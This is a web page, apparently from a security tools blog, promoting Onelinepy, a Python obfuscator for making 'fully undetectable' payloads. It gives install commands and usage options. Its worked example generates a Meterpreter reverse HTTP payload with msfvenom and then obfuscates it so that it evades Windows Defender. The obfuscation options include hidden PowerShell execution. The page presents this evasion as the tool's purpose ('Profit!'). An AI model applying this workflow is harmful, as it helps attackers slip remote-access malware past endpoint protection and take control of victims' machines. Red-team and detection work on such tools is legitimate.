Onelinepy : Python Obfuscator To Generate One-Liners And FUD Payloads

Onelinepy is a Python Obfuscator To Generate One-Liners And FUD Payloads.

Download & Run

git clone https://github.com/spicesouls/onelinepy
cd onelinepy
chmod +x setup.sh
./setup.sh
onelinepy

Usage Guide

_ | || _ _
| . | | –| | | | –| . | | | Python
|||||||||| | | Obfustucator |_| ||
usage: oneline.py [-h] [-m M] [-i I] [–script SCRIPT] [–code CODE] [–list] [–output OUTPUT]
optional arguments:
-h, –help show this help message and exit
-m M Obfustucating Method (i.e, -m /one_line/base64)
-i I Iterations For Obfustucation.
–script SCRIPT File path of Python file to Obfustucate.
–code CODE Python code to Obfustucate.
–list List Obfustucating Methods.
–output OUTPUT Output File.

Example: Creating FUD Meterpreter Python Payload
  • Generate Python Payload:

msfvenom --payload python/meterpreter_reverse_http LHOST=... LPORT=... > payload.txt

  • Obfustucate Payload

onelinepy -m /one_line/base64 --script payload.txt -i 3 --output obfustucated_payload.txt

  • Profit! The Obfustucated Payload works against Windows Defender.

More Examples

onelinepy -m /one_line/base64 –script payload.py -i 3

onelinepy -m /one_line/hex –code “print(‘HEX!’)”

Obfustucation Method List

_ | || _ _
| . | | –| | | | –| . | | | Python
|||||||||| | | Obfustucator |_| ||
Obfustucators ( * = May cause Syntax Errors )
-=============-
0 /one_line/hex
1 /one_line/base64
2 /one_line/base32
3 /one_line/gunzip*
4 /one_line/rot13*
5 /cmd/command
6 /cmd/powershell
7 /cmd/powershellhidden

R K

Recent Posts

Cybersecurity – Tools And Their Function

Cybersecurity tools play a critical role in safeguarding digital assets, systems, and networks from malicious…

10 hours ago

MODeflattener – Miasm’s OLLVM Deflattener

MODeflattener is a specialized tool designed to reverse OLLVM's control flow flattening obfuscation through static…

10 hours ago

My Awesome List : Tools And Their Functions

"My Awesome List" is a curated collection of tools, libraries, and resources spanning various domains…

10 hours ago

Chrome Browser Exploitation, Part 3 : Analyzing And Exploiting CVE-2018-17463

CVE-2018-17463, a type confusion vulnerability in Chrome’s V8 JavaScript engine, allowed attackers to execute arbitrary…

10 hours ago

Chrome Browser Exploitation, Part 1 : Introduction To V8 And JavaScript Internals

The blog post "Chrome Browser Exploitation, Part 1: Introduction to V8 and JavaScript Internals" provides…

10 hours ago

Chrome Browser Exploitation, Part 3: Analyzing and Exploiting CVE-2018-17463

The exploitation of CVE-2018-17463, a type confusion vulnerability in Chrome’s V8 JavaScript engine, relies on…

13 hours ago